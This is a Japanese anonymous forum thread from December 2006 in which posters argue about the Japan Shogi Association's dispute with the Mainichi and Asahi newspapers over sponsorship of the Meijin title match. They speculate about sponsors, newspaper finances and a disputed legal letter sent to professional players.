678 :名無し名人:2006/12/02(土) 14:27:38 ID:Lp7g1I+5
女流の皆さん、俺の(使ってない)マンションに来いや。
結婚用に買ったんだが女に逃げられた。
4LDKあるど。スタートはそんなもんでいいだろ。
近くに何時でも空いてる区の施設がある。畳の部屋もたくさんあるど。
お茶とかお華のお稽古用みたいなのだが、そんなに使われている感じは無い。
江戸川区なんだけど・・・、遠いか?
何なら、駅からの送り迎え俺がしてやってもいいぞ。小岩駅なんだが・・・、

やっぱ、駄目そうだね。

679 :名無し名人:2006/12/02(土) 14:47:33 ID:ej/6XJbM
>>678
女流棋士会のHP逝ってアドレス調べてメールしてみろよ。
喜んでもらえると思うよ。

680 :名無し名人:2006/12/02(土) 15:47:57 ID:XOPkL0L3
>>679
同歩。
2ちゃんで「俺のマンションに来い」といわれてもw
本気ならじかに連絡すれ。
マンションはともかく公共施設情報などは意外に盲点でよろこばれるかもよ。

681 :名無し名人:2006/12/02(土) 16:25:56 ID:Qd/NcZZm
朝日は広告激減、部数は押し紙と系列の販売会社への寄せ紙でしのいでいるかに
見えるが実態は400万部もとうに切れてる。この部数にはほとんど売れ残る
駅売りの返品分も含まれてるからひどい。武家の商法を続けるわけにもいかなく
なり幹部の一部は事態を深刻に受けとめ始め、社会部解体などに手をつけたがもは
や時代の流れは如何ともしがたい。文化部の将棋の問題などうるさいアブの羽音
くらいにしか聞く余裕もない。大きな泥舟から小さな泥舟に手を差し伸べているの
図。

682 :名無し名人:2006/12/02(土) 18:01:11 ID:0SJlfru+
毎日って脅迫状を棋士全員に出してたんだな卑劣。

683 :名無し名人:2006/12/02(土) 18:19:35 ID:ebMnADqz
五年しか持たない船から十年しか持たない船に乗り換えたのはあたりまえ

684 :名無し名人:2006/12/02(土) 20:08:26 ID:PXC9huyZ
>>683
毎日新聞は30年間将棋にいちばん金を出してくれたスポンサー。

685 :名無し名人:2006/12/02(土) 21:36:04 ID:fNCN2Z8c
その金の出所の大部分は某宗教団体ってオチかいな

686 :名無し名人:2006/12/03(日) 00:06:15 ID:APoHCrO+
あっちこっちで火の手が上がってるが、
本題の名人戦は進展なし?

687 :名無し名人:2006/12/03(日) 00:07:08 ID:ZemhCDw/
>>683
今更、そんなプロパガンダは遅いw

688 :名無し名人:2006/12/03(日) 00:08:30 ID:ZemhCDw/
追加。
>>682
もっと遅い

689 :名無し名人:2006/12/03(日) 05:56:18 ID:oWroKr3H
>>664
決算公告は、こないだの公告部のインサイダー取引で激減。
あと、インターネット公告が一般的になってきたので、
新聞での決算公告は不要になってきている。

690 :名無し名人:2006/12/03(日) 09:18:08 ID:FQS7B0BC
将棋なんかやめてチェスやるべ、ドーハにも行けるぞw

691 :名無し名人:2006/12/03(日) 13:38:54 ID:FQS7B0BC
毎日は将棋欄やめてチェス欄作ってくれ。

692 :名無し名人:2006/12/03(日) 16:24:37 ID:J80HkNPS
チェスは競技人口が少ないから、国際代表になりやすいというのに、
競技人口が少ないチェス欄を作れというのは変だな。

693 :名無し名人:2006/12/03(日) 22:08:55 ID:ibY+Kq5v
新聞社の内部事情が暴かれだしたな。

694 :名無し名人:2006/12/04(月) 05:45:01 ID:r1Ia6B1d
>>681
さすがに朝日は四百万部切ってないと思うぞ。
それだと読売は六百万部を切っている計算になる。
全国紙が地方紙に圧倒されつつあるのは確かではあるが…
地方紙が伸びているんじゃなく、全国紙が減ってる

いずれにせよ現在の将棋人口から考えてスポンサー料が高すぎるのは事実。
プロ野球オールスター、Jナビスコ杯、Jオールスターでも3〜5億円。
露出度、一般国民へのアピール度を考えると、あり得ないくらい高い。
名人戦主催が毎日、竜王戦主催が読売なんて将棋ファン以外知らないし。
テレビ中継で「読売竜王戦第五戦!」とか連呼するわけでもない。

メンツ大好きな新聞社に甘えられているうちはいいが、
イメージが悪くなりすぎて撤退の口実を与えてしまうと、
大変なことになると思う。棋譜の独占掲載権とか言ってもねぇ。
もし連盟サイトで独占掲載&ネット広告に切り替えたとして、
一体いくら稼げるって話だよ。目も当てられない…

695 :名無し名人:2006/12/04(月) 11:59:09 ID:D6bKf0d1
将棋世界の記事で新聞社が主催だけどスポンサーが別途つくのは問題ないってあったよな。
今後はそういうほうこう探ったほうがいいね。

696 :名無し名人:2006/12/04(月) 12:06:09 ID:b7+v1nPz
現に名人戦では大和証券がついてたな

697 :名無し名人:2006/12/04(月) 18:10:38 ID:MN2Z1KnP
んー新聞から金が取れないのはよくわかった上で、
「8億出せ、大和方式で他のスポンサーを付けていいから」
って言ってるのかな。
しかし、名人戦にこれ以上他のスポンサーをつけられんし、
名人戦以外の王将やオープンは自分で価値を否定したようなもんだから、
新しいスポンサーはつかないと思うがな。

698 :名無し名人:2006/12/04(月) 23:21:18 ID:EWM/UDOH
金がねぇ毎日はもう名人戦来なくていいよ
他の棋戦だけよろ

699 :名無し名人:2006/12/04(月) 23:37:49 ID:svGy+Qd4
やはり最も権威のある名人戦のスポンサーは
業界第1位の日興コーディアルグループでないとしっくりこない。
2位の野村ホールディングスには竜王戦がふさわしい。
3位の大和証券には王将戦のスポンサーになってもらってもいい。

700 :名無し名人:2006/12/04(月) 23:41:24 ID:CNUY7vAL
みずほフィナンシャルグループですが、何か?

701 :名無し名人:2006/12/04(月) 23:49:23 ID:WjC50sya
そうなると、朝日オープンは、トヨタカップと名を変えてニュースタートだな。
もちろん、トヨタカップだから、真の名人決定戦と銘打つ。
協賛は、東海銀行、デンソー、その他ご覧のスポンサー。
じゃあ、5番勝負の場所は、名古屋城か?ああ、ナゴヤドームもあるな。



702 :名無し名人:2006/12/05(火) 00:07:30 ID:1qEm+8N5
東海銀行ってw
何年前から思考停止してるんだお前の脳はw

703 :名無し名人:2006/12/05(火) 00:14:34 ID:tATQz8zu
そういや囲碁はちゃんと3位の本因坊が大和で毎日なんだな

704 :名無し名人:2006/12/05(火) 00:42:32 ID:Pu/8q060
じゃあ、漏れも提案する。太陽神戸銀行杯w

705 :名無し名人:2006/12/05(火) 01:21:05 ID:1Qvi2XoG
やっぱ山種証券杯だろ。

706 :名無し名人:2006/12/05(火) 03:02:03 ID:SURDPAqu
金金の将棋連盟には
サラ金あたりがお似合いじゃないか

707 :名無し名人:2006/12/05(火) 03:15:45 ID:wT31gAQo
>>706
皮肉のつもりだろうが、案外現実的な案かもしれんよ。
いま羽振りがいいのはサラ金ばっかじゃん。街でもテレビでもサラ金の広告ばっか目につく。
名人戦もサラ金に主催してもらったほうが連盟は潤うだろうし、
もしかしたらCM出演の儲け仕事も増えるかもしれん。


708 :名無し名人:2006/12/05(火) 09:45:30 ID:AyQOQGOI
ギャンブル→サラ金
を連想されるから、サラ金が嫌がる。

709 :名無し名人:2006/12/05(火) 10:08:50 ID:dCKGbWba
アルゼ杯女流名人位戦があるわけだし

710 :名無し名人:2006/12/05(火) 10:57:27 ID:8PYYBj4c
サラ金は上限金利の引き下げ(グレーゾーン撤廃)で青息吐息、もうすぐ廃業続出ですよ。
とてもじゃないが話しに成らない。
ま、棋士は自分でスポンサーと契約するなどして自活するしか道が無くなるきがする。
商品価値のない棋士はそれで自然淘汰される。
もう護送船団の時代じゃない。

711 :名無し名人:2006/12/05(火) 11:56:20 ID:v/D0MijF
4月頃の繰り返しになるけど、名人戦問題は連盟の構造問題なわけだから。
とにかく、棋戦一つの動向が全体経営に関わるようでは辛いのでは。
棋院のように国際棋戦を組めるわけでもないし。アジア市場あってのトヨタ杯。

数日前、日経に東大の囲碁授業(二年目)の話が出てたけど、
(棋院は石倉や梅沢を講師に送り込んでる)
当然、単なる授業にとどまらず、授業成果を元に入門カリキュラムの開発も進めてるらしい。

スーパーブレインも本来の落としどころは機械戦3,000万?ではなく、
そんな社会に響く実学であるべきと思うし、
都立校に将棋の伝統授業を!ついては講師は棋士が!じゃ、ただの目先の儲け話かもね。
悪口ばかりですまんです。

712 :名無し名人:2006/12/05(火) 15:55:56 ID:hqmO15/0
>711

ちっとも悪口なんかじゃない、ちゃんとした批判だと思いますよ。

713 :名無し名人:2006/12/05(火) 21:12:22 ID:SXdc1ORs
12月になって、毎日のHPはアマと女流の話題ばかり。
果たして、大金吹っかける連盟に反旗をひるがえしたのか?

ttp://www.mainichi-msn.co.jp/entertainment/shougi/archive/news/2006/12/index.html

714 :名無し名人:2006/12/05(火) 22:53:36 ID:6/7abZPC
>>713

コイツ最高にアホやな

毎日が一番丁寧に全国の将棋記事を書いてくれているということと
銀河戦につながるアマ王将戦を主催してくれているのに

715 :名無し名人:2006/12/05(火) 23:29:24 ID:G/SvtFjh
まあ今、名人戦や王将戦について記事にすると何かと問題になるから、
アマと女流の話しかできんわな。

716 :名無し名人:2006/12/06(水) 00:27:20 ID:+l79RmeR
>>714

おれが最高のアホなら、おまえは最低のアホや!

717 :名無し名人:2006/12/06(水) 00:29:10 ID:VSqF7pE/
あほがあほにあほゆうてまんな

718 :名無し名人:2006/12/06(水) 11:13:25 ID:QYyBoYfU
今回の騒動で名人戦以外には価値がないと連盟も新聞社も認めたような形だし、
王将よりは女流のビッグタイトルを作った方が安上がりかな

719 :名無し名人:2006/12/06(水) 12:08:48 ID:N26xfpsd
女流に金を出すほうが効率よさそうだね。

720 :名無し名人:2006/12/06(水) 13:40:28 ID:9PzEGeTM
>>716
こういうレスのときでもID変えるafo

721 :名無し名人:2006/12/06(水) 13:55:18 ID:kzBK07qU
7800万あると女流なら最高棋戦だわな。
ただ注目度も低い。今は瞬間風速でかなりあるが。
林葉は羽生以上の知名度だそうだけど、引っ張り出したらそれこそ連盟と全面対決になるし。

722 :名無し名人:2006/12/06(水) 14:32:28 ID:m0dY1z2P
年内にまとまらないようでは、だめだな。

723 :名無し名人:2006/12/06(水) 15:13:24 ID:yc3LAedG
奇襲はうまく決まらないとあとが辛いよね。
こんなふうに半年以上にも及ぶ持久戦になるって、いまだに決着がつかないって
それだけでも大失敗だね。
将棋を極めた名人クラスでも経営問題の作戦ではドシロートだってこと。
そんなのは当たり前のことなんだが。

724 :名無し名人:2006/12/06(水) 15:35:39 ID:uckoFYpg
将棋会館も企業の名前をいれて
スポンサー料で稼ぐべき。


725 :名無し名人:2006/12/06(水) 19:51:31 ID:mQbfSMiB
瓢箪から駒というか、新聞社の決算ってすげーな。販売収入は全く新聞社の手元に
残らず、販売で使い切る。広告収入だけが新聞社の上がりになるがそれが激減。
販売店は販売店で新聞収入は手元に残らず押し紙仕入れと営業経費に使い切る。
オリコミ収入だけでやってるんだが、俺の近所の販売店、週に何回かトラックに
山のように封も切っていないチラシを積んで回収してもらってる。スポンサーは
何割かカットして納入しててそのザマだ。これって詐欺行為がこの業界ではお咎め
なしに横行しているってことじゃないのか。談合なんぞよりはるかに巨悪だぜ。

726 :名無し名人:2006/12/06(水) 19:54:31 ID:6lbH1Pyg
そろそろ毎日新聞止めてもいい?

727 :名無し名人:2006/12/06(水) 20:01:01 ID:zBpg0/53
>>724
ア○ゼ将棋会館か

728 :名無し名人:2006/12/06(水) 20:08:05 ID:uckoFYpg
>>725
それどこの新聞ですか。
チラシは、お金を払って新聞に入れてもらうため
そんなことしているのは金を盗んでいるのと同じ。

729 :名無し名人:2006/12/06(水) 20:15:08 ID:1p0tVxZ6
将棋版の縁の余白のところに企業名入れるとか
中継の時はその盤使うの
あと棋士の右手の甲に企業ステッカー貼る


730 :名無し名人:2006/12/06(水) 20:19:53 ID:uckoFYpg
将棋は普通の会社員と同じで
給料や賞与があること自体おかしい。
プロというくらいだから、他の個人競技の
プロを見習ってそういうところを直していくべき。

731 :名無し名人:2006/12/06(水) 20:25:13 ID:EQEuW562
将棋指しは人間的に馬鹿の集まりなんだよ。



732 :名無し名人:2006/12/06(水) 20:27:02 ID:RzAs8e1l
そういえば、共催が決まってから朝日OP一切ネット中継をしなくなったね。
むしろ、毎日の方が王将戦の中継をやったりテンションあげている気がするが・・・

733 :名無し名人:2006/12/06(水) 23:23:26 ID:+l79RmeR
>>720
ID変わったのは日付が変わったから。
故意に変えたわけではない。
そんなことも知らんとは doafo!

734 :名無し名人:2006/12/06(水) 23:31:11 ID:Rlu2HMXA
33733スレ、1つも読まずに発言するが・・・


朝日は毎日を吸収しようってことか!?

今一歩、朝日のメリットが理解できないのだが。

前の33733スレでは、どういう結論になってるの?

735 :名無し名人:2006/12/06(水) 23:33:01 ID:z+TFhIXx
将棋連盟はちゃんと法人税払ってるの?
あまりカネカネ言ってると国税に目付けられて薮蛇になるぜ?

736 :名無し名人:2006/12/06(水) 23:36:09 ID:i1nYJP7T
>>735
過去スレでも読んで、社団法人の税制の仕組みを勉強してから書き込もうな。

737 :名無し名人:2006/12/06(水) 23:40:40 ID:z+TFhIXx
オマエ何も知らないなww

738 :名無し名人:2006/12/07(木) 00:27:16 ID:PftDbKlv
>>724
マジレスすると社団法人としてはそれは無理。
連盟解散して株式会社として再出発するという手なら一局だけど。

739 :名無し名人:2006/12/07(木) 00:32:00 ID:H1JLVJ69

>>732
どう考えても、ネット中継で考えたら

毎日>>>>>>>>>>朝日だよ

いつか住人がネット中継に関して朝日に電凸してくれたことがあったけど、
朝日は我々をバカにした感じだったというもんね。

740 :名無し名人:2006/12/07(木) 00:33:32 ID:2SBJgrxp
すると、女流が社団法人じゃないから免状に税金がかかる、
等とマイナス面が言われているが、逆にスポンサーとかは付け放題ということか?
せっかく独立したのなら、そういう点を巧く利用してもらいたいものだ。

741 :名無し名人:2006/12/07(木) 11:02:11 ID:p1ET520C
序列1位は竜王戦、でもお金は欲しい。
あちら立てれば、こちら立たず。
将棋連盟は最悪の事態に、そもそも一方的な契約解消の通知書に
始まる悪手の連発。だいたい副立会人とか囲碁にはいないだろ
記録係りを二人にしてやれよ。

742 :名無し名人:2006/12/07(木) 12:39:36 ID:bzHzokhu
最近の連盟は北の方の某国になりつつあるな


743 :名無し名人:2006/12/07(木) 18:57:53 ID:pExf0Q0c
もう連盟は事実上崩壊しているのだから暖かく最後を看取ってあげて。
今まさに寿命が尽きなんとしているのだから・・・

744 :名無し名人:2006/12/08(金) 02:25:25 ID:XD+9zT3x
お詫びと訂正
 2007年1月号の 52ページ、田中理事の証言20の文中で朝日新聞社の箱島信一・前社長を箱崎信一・前社長と誤って掲載してしまいました。
関係者各位には大変失礼を致しました。
訂正してお詫び申し上げます。

745 :名無し名人:2006/12/08(金) 07:06:51 ID:L0r7ylfV
箱崎晋一郎
たった一度の 倖せが
はかなく消えた ネオン街
忘れられない 面影を
月にうつした 湯の宿よ
熱海の夜

746 :名無し名人:2006/12/08(金) 11:00:25 ID:I0sMEzZd
>>738
Jリーグも社団法人なのでやりようによっては可能では?
スポンサーがつくかどうかという根本的な問題はあるが。

747 :名無し名人:2006/12/09(土) 03:48:46 ID:jqp0hnYw
>>743
同意。

その後、女流の傘下で再生、がベストシナリオか。
失着連発の※のおかげで、人気の女流、実力の男流?、が定着したりしてw

748 :名無し名人:2006/12/09(土) 03:55:23 ID:tnKm8ahp
女流のどこに人気あるん??

749 :名無し名人:2006/12/09(土) 15:50:25 ID:uvROuePU
滋賀のファンが将棋博物館廃止の件で文句を竜王戦解説の神崎に言っても
しょうがないだろう

750 :名無し名人:2006/12/09(土) 18:48:35 ID:0PvZvnA3
>>734
33733スレ→32733レス

751 :名無し名人:2006/12/09(土) 19:35:22 ID:k/ewm9Mu
■名人戦
 両新聞社と共催の協議中です。どのように結着がつくにせよ年内です。笑うのか泣くのか怒るのか。

普及
 お金を頂けるのかどうかは分かりません。もしも普及協力金があるのなら教育、子ども、地域振興とプランはいっぱいです。皆様のお智恵も拝借して楽しい将棋界になるよう努めます。

■ネット
 インターネット放送局を立ち上げる。これは将棋倶楽部24の譲渡ですが、若い人への置き土産です。
 大和証券グループは今年が一億円、そして来年も又引き続き行おうと鈴木社長が記者会見で力強く語りました。将棋倶楽部24の対局、観戦は今まで通り全て無料です。そのうえで有料の付加価値をつけての面白いものを提供出来ればとも思っています。

752 :名無し名人:2006/12/09(土) 19:52:20 ID:jdP+jQDD
>>749
ファンというか支部長。
今回の竜王戦の盤駒を提供している。
一支部長が何か言った所でどうしようもないが。

753 :名無し名人:2006/12/09(土) 20:01:10 ID:MrybiSPS
>>721
最高棋戦どころか…全女流棋戦の合計でも7800万には届かない。
なにせ最高賞金額が130万程度だからな…

http://www.toonippo.co.jp/tokushuu/danmen/danmen2006/1202.html

現在、女流棋戦はタイトル戦が4、公式戦が2。この6棋戦合計で契約金は
推定7000万円にも満たないといわれる。連盟が事務経費などを取るため、
女流棋士に渡るのは5000万円(推定)以下。賞金や対局料を含めて、である。
現役は50人だから平均年収100万円。これに満たない女流棋士も多い。
後は将棋祭のゲストなどのアルバイトしかない。
女流タイトルは最高の優勝賞金でさえ、男性の最高額、
竜王戦の3200万円の4%足らずだ。「自分たちで運営できる棋戦をつくらないと…」。
連盟頼りでは改善はない、との危機感が女流棋士を包んだ。

754 :名無し名人:2006/12/09(土) 20:04:14 ID:q9J7lvoG
>>751
実は機械の方が目玉だから人間が負けるまで続けてくれそうな雰囲気
うまくやったじゃん

>>752
寄付できそうな物とか持ってんじゃね

755 :名無し名人:2006/12/09(土) 20:24:26 ID:cU4auc6F
連盟ははだから〜少ない
予算なんだから事務経費くらい負担してやれよ。
頭悪いね。いうなれば生き金よ。フリークラスの平均年収300万は
逆に死に金。

756 :名無し名人:2006/12/09(土) 21:57:28 ID:HRQUA9Xp
>フリークラスの平均年収300万

さすがに貰いすぎだろう。年間30局でも1局10万円w
フリクラ同士の棋譜に20万円の価値なんてないw
20万円は大卒初任給の価値。

757 :名無し名人:2006/12/09(土) 23:27:34 ID:GjvC1RAj
平均的なフリークラス棋士なら年15局もないよね

758 :名無し名人:2006/12/09(土) 23:39:20 ID:+FgpXDLX
女流やフリクラは指導棋士としての派遣回数や収入が分からんと、
本当のところが分からんな。

759 :名無し名人:2006/12/10(日) 09:04:08 ID:EPczv75H
よみくまが爆弾投下キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
ttp://shogi-pineapple.com/bbs/pro/index.html#1

157: 名前:よみくま投稿日:2006/12/10(日) 08:51
「名人戦の真実」というタイトルにはほど遠い内容ですね。
はっきり言って笑ってしまいました(笑)
共催問題に関して、読売新聞に事前通告をしなかったことなど契約違反を指摘された
連盟上層部が読売に謝罪したことなど、読売関係で理事会にとって不利益な話は一つも出てませんね。
朝日、毎日への取材もなく「真実」とは驚きますね。

>>754
平均310万円です (将棋世界1月号森下談 中原含めての平均だから実質的にはその30万は下)

760 :名無し名人:2006/12/10(日) 09:52:09 ID:0kv7jdtA
予想されていたことだけど、読売は相当に不快感があったんだね

761 :名無し名人:2006/12/10(日) 11:43:50 ID:ESLvIwjy
やっぱり、理事会バカ、キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
名人戦の契約金を吊り上げて、竜王戦も吊り上げようとしたんだろ。
毎日だけじゃなく、読売も相当頭きてるんだろう。

762 :名無し名人:2006/12/10(日) 11:56:07 ID:adm/TXmK
読売は竜王戦の契約金を思い切り減額してやれ。
それでも「序列1位」は保証するんでしょw

763 :名無し名人:2006/12/10(日) 12:08:27 ID:VnoCXeLE
従来の竜王戦の契約金は女流込みのもの、女流が独立するなら半額、とか。



764 :名無し名人:2006/12/10(日) 12:18:25 ID:UicD+54S
確かに名人戦の真実では朝日・毎日への取材はしてなかったようだし、
読売に謝罪したこととかまったく載ってなかったね。
自分たちに都合の悪いことは載せてないとは、
大本営発表ごとく、情報操作しているだけじゃねえか。
ひどい人間たちだ。


765 :名無し名人:2006/12/10(日) 12:27:41 ID:p06gqzPZ
毎日が訴訟脅迫まがいの書面を送りつけたことは、自分たちで記事にしてたっけ?

766 :名無し名人:2006/12/10(日) 12:40:28 ID:VnoCXeLE
>>765
>毎日が訴訟脅迫まがいの書面を送りつけた

詳しく。
脅迫「まがい」といえば米長も日記で一時盛んにやってたな。
大崎他、数人の名前を名指しにして。名前を出さずにほのめかすだけのもあったが。

767 :名無し名人:2006/12/10(日) 12:43:49 ID:dTSR3iIW
朝日毎日に取材しなかったのは「断られたから」の可能性もあるよな。
「議論中に軽軽しく答えられない」というような。

768 :名無し名人:2006/12/10(日) 13:20:12 ID:b+OARoUN
狼少年はいずれだれからも相手にされなくなるのだ

769 :名無し名人:2006/12/10(日) 13:21:31 ID:p06gqzPZ
>>766
毎日新聞が棋士個別に送りつけた文章が今月の将棋世界に
そのまま載ってる

<<仮に連盟が弊社との契約を解除する決定をした場合には、
私どもは場合により法的手段を取ることも考えております。
顧問弁護士によりますと、契約に基づかない行為によって、
連盟が巨額な損害賠償の責任を負う可能性があります。
連盟が巨額な損害賠償を問われれば、連盟にとって
経済的にも社会的にも大きなダメージとなるでしょう。 (以下略)>>

将棋連盟はこれに対して東京地検の最高検刑事部長に相談し、
連盟が賠償責任を負う可能性はゼロと判断。
また、毎日の文書は棋士を怖がらせるための悪質な
「脅迫文言」であるとの文書回答も得た。

連盟理事宛てだけならともかく、棋士それぞれに送りつけていた
ってのは問題だと思う

770 :名無し名人:2006/12/10(日) 13:25:43 ID:zK285Pnv
>>769
七番勝負すら金取る新聞社がずいぶん偉そうだな。
なんか毎日も胡散臭くなってきたな。

771 :名無し名人:2006/12/10(日) 13:27:23 ID:UicD+54S
将棋世界では、一方的に契約破棄するなどの行為が、
契約違反にあたると判断されると多額の違約金のようなもの
が発生するというような文書を送ったとかいう話だったね。
別に普通の事で脅迫とはいえないとは思うが、連盟が相談した弁護士は
問題ありと判断したらしい・・ただし弁護士というのは
依頼者の立場に立って発言するからそれが絶対的な判断とは言えない。
読売への事前通告をせずあとになって謝罪したことを公表しなかったのを
見ても連盟に都合のいいことだけ書いてるわけだし・・。


772 :名無し名人:2006/12/10(日) 13:28:39 ID:p06gqzPZ
米長の日記の脅迫部分ってどこだっけ?
まだ記事残ってるならURL教えて

773 :名無し名人:2006/12/10(日) 13:30:44 ID:zK285Pnv
中継で金を取り、連盟から違約金を取り、毎日は金取る事ばかり考えてるな。
連盟とあんまかわらん。

774 :名無し名人:2006/12/10(日) 13:42:14 ID:UicD+54S
女流から事務経費とり、一方的に契約破棄する連盟の方が
はるかにひどいと思うが・・。


775 :名無し名人:2006/12/10(日) 13:51:46 ID:p06gqzPZ
>>771
まぁ毎日新聞もこういう文書を棋士個別に送りつけてたことなんて
全く記事にしてなかったし、どっちもどっちでしょw
この毎日の文書って、連盟の名人戦契約解消の際の文書よりも
悪質と思うよ
あっちが無礼だから私たちも無礼に、っていうならそれこそ
どっちもどっちだし、少なくとも信義を重んじるなんて
言える行為ではないと思うけど・・。

776 :名無し名人:2006/12/10(日) 14:31:38 ID:WVyoEkGu
毎日新聞に信義なんてまったく感じられない。
毎日新聞 信義無し
金 無し
購読者 無し。

777 :名無し名人:2006/12/10(日) 14:41:33 ID:Fy9peYPI
何をいまさら。毎日新聞。朝日新聞。日本将棋連盟。
みんなくそだろう?

くそ同士でああだこうだ言ってるだけ。もう逝ってよし。

778 :名無し名人:2006/12/10(日) 14:48:18 ID:1UW99uHy
>>769
>将棋連盟はこれに対して東京地検の最高検刑事部長に相談し、
>連盟が賠償責任を負う可能性はゼロと判断。

これ、なにげに凄くない?
民事トラブルにたいして検察庁の官僚が意見を言うのって職権的に問題ないのかね?
相談するほうもどうかしてるし、そんなのを相手する官僚もアウト臭い。

個別の棋士に送ったのは、理事会に送っても握りつぶして棋士に伝わらないと
判断したんだろうね。

しかしせっかく共催で落着しそうになっているのに、今ごろ機関誌で
共催のパートナーである毎日を批判するとは、将棋連盟って異常杉。

779 :名無し名人:2006/12/10(日) 14:56:48 ID:2Jxvpbxl
そもそも「東京地検の最高検刑事部長」ってなんなんだよw
地検が最高裁の裁判に出るようにでもなったのか
嘘くせーーーーーーーーー

780 :名無し名人:2006/12/10(日) 15:02:02 ID:6zY9DW+n
なぜ今、急に毎日批判が出だしたのかを考えると良い

781 :名無し名人:2006/12/10(日) 15:09:52 ID:VI05B+YS
理事会批判は永久に続くと思いますが。

782 :名無し名人:2006/12/10(日) 15:11:46 ID:eTKarWAU
最高検刑事部長に相談したなんて書いちゃっていいのか?
一個人に特定できるじゃないか。
検察OBの弁護士と言うなら話は分かるが・・・、
検察庁というのは、あくまで、行政府。平たく言えば、お役所だぞ。
お役人が、本職と無関係な個々のケースの相談に応じていい筈は無い。
それは、どんな高い地位の人物であっても同じ。
というよりむしろ高い地位の人物だからこそ、問題になる。影響力があるからね。

しかし、刑事部長に民事の案件を尋ねてもなぁ。もちろん、法律の専門家だから何でも知ってるけど。
ああ「脅迫文書」という発言を引き出したという趣旨なのか。それなら確かに刑事事件だねぇ。
でも、この程度の文書で「脅迫罪」の要件が構成されるかなぁ?
知識不足の人達に専門用語並べ立てて、恐がらせた、とまでは言えるかもしれないけど、
現実に警察や地検特捜部が動くという話でもないでしょ。

仮に弁護士なら、>>771の言うことが当たってる。法律で争う覚悟と相手が来たら、弁護士は、
依頼人の立場から、考え得る最強の理論武装をアドバイスするよね。
最終的には、協議に落すにしても、それが、法律論争と言うものだから。

それよりも、将棋世界には、本当に東京地検の最高検刑事部長と書いてあるの。
元の字が抜けてるんじゃないの。
そこら辺、もし、事実と違っていたら、ただの誤植じゃすまないよ。
(朝日の担当部長の名前を誤植した件だって、とんでもない失礼なんだけど、
ただの失礼で済むのかどうか、という話。)

連盟は、本当に危なっかしいことするよなぁ〜、手抜かりが多くてヒヤヒヤするよ。

783 :名無し名人:2006/12/10(日) 15:15:41 ID:eTKarWAU
ああ、>>779の言うとおりだw
こんなこと気がつかないのかって、自分でもワロタ。
じゃあ、俺も叫ぶわ。
「東京地検の最高検刑事部長」ってなんなんだよ〜〜〜w

それって、東京国税局の国税庁長官みたいなもんだぞw

784 :名無し名人:2006/12/10(日) 15:47:34 ID:+A3iilYL
偉そうな名前を挙げて相手をハメこむのは鷺の手口と変らん。

785 :名無し名人:2006/12/10(日) 15:53:10 ID:Mjazdtq4
相談相手は弁護士。
東京地検特捜部長、最高検刑事部長、名古屋高検検事長などを歴任
と書いてある。
ちゃんと読んで書こうよ。

しかし、吉村氏は恥ずかしくないのかな? 将棋連盟が大枚はたいた
というなら金のためと納得できるけど。
原稿料が多額ならそれはそれで問題か。


786 :名無し名人:2006/12/10(日) 15:56:02 ID:p06gqzPZ
>>778
ミスった
それ違うわごめんw
また後で正確に書き直す

787 :名無し名人:2006/12/10(日) 15:57:56 ID:p06gqzPZ
てもうみんな書いてくれてたね
>>785の通り。
ところで、何が恥ずかしいの?

788 :名無し名人:2006/12/10(日) 16:31:21 ID:Mjazdtq4
>>787
恥を知っていれば書けない文章なのは読めば解るでしょ?

最後に書いてある
「不当に歪められた名人戦主催に関する真実を、いままで沈黙を通して
耐えてきた理事会側の立場から、「ほんとうは何が起きていたのか」を
できうる限り正確に描いたものである。そして名人戦は誰のものであるの
か−何よりもそれを明確にする目的があった。

冒頭にこれを書いてくれれば、買ってまで読む必要はなかったのに。
所々に本当っぽいことも書いてあるけど、全体のトーンは理事会の立場
を正当化するための、ジャンケンの後出しみたいな内容じゃない。

789 :名無し名人:2006/12/10(日) 16:56:18 ID:p06gqzPZ
>>788
うーん、何が恥ずかしいのかよく分からないな
どの辺が嘘と思うのか教えて欲しいとこだけどまぁいいか

790 :名無し名人:2006/12/10(日) 16:59:39 ID:tKWPB6It
>>769
>連盟理事宛てだけならともかく、棋士それぞれに送りつけていた
>ってのは問題だと思う

それだけじゃ誰が送ったのか分からない。極端な話、毎日新聞は全く絡んでなくて、
将棋連盟内部の毎日派の若造の義憤に駆られた軽挙妄動という可能性すらある。
どうして毎日新聞が全棋士の住所などという個人情報を把握しているのか。
名人戦を争うごく一部のトップ棋士の住所を知っていてもおかしくはないが、全ての棋士とは考えにくいのだ。
そんな必要があるとは思えないし、あっても目的外使用は個人情報保護法に抵触する。
いくら錯乱したとしても社を挙げて、そんな馬鹿な事をするとは思えない。
絡んでいる者がいたとしてもそれぞれの下っ端同士が結託して起こしたという可能性もある。
実際にそういう文書が送られて多くの棋士が本物と思い込み動揺したというあたりまでは確かであっても
ほんとの事は何にも判明してない。真実と銘打っても何事も限界がある。
どちらも事を荒立てられる立場じゃないと思うから、毎日新聞が送りつけたと一方的に決め付けるのは
よろしくないと思う。

791 :名無し名人:2006/12/10(日) 17:07:10 ID:UicD+54S
よみくまの言うとおり、
朝日・毎日に取材なしでは一方の言い分だけだからね。
よくこんなんで真実とか言えるね。呆れる。

792 :名無し名人:2006/12/10(日) 17:16:18 ID:8hw3vfyV
>>788
>いままで沈黙を通して耐えてきた理事会側の立場から

沈黙を通して・・・耐えてきた・・?

米長会長は名人戦問題について一言も語って・・・なかったっけ?沈黙してる?
田中理事は外部に向かって一言も語ってない?インタビューにも一切応じてない?
理事会は沈黙を通して・・・いる?

大本営発表乙。

793 :名無し名人:2006/12/10(日) 17:21:39 ID:p06gqzPZ
>>790
毎日新聞社の印があったらしいよ

794 :名無し名人:2006/12/10(日) 17:39:10 ID:UicD+54S
あとなんか今回の問題で※が
10回も100回も謝ったと書いてあったけど、
100回以上も謝ってないだろ、さすがに。
吉村って嘘ばっかり書いてるなw

795 :名無し名人:2006/12/10(日) 17:50:19 ID:p06gqzPZ
>>794
他には?

796 :名無し名人:2006/12/10(日) 17:53:20 ID:DQnBApTH
よみくまwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

797 :名無し名人:2006/12/10(日) 18:04:47 ID:ft0KCTAN
よみくまの暴露で年内には無理か
上層部はともかく、現場の人間は3社とも
怒り心頭だろう。

また名人戦1年中止か?

798 :名無し名人:2006/12/10(日) 18:57:50 ID:msEj4V8w
楽天名人戦とかでいいよもう

799 :名無し名人:2006/12/10(日) 21:23:52 ID:+A3iilYL
>794
頭を垂れて舌を出し

800 :名無し名人:2006/12/10(日) 21:23:56 ID:HpDpm2pt


★朝日新聞は日本の若者から信頼されています★

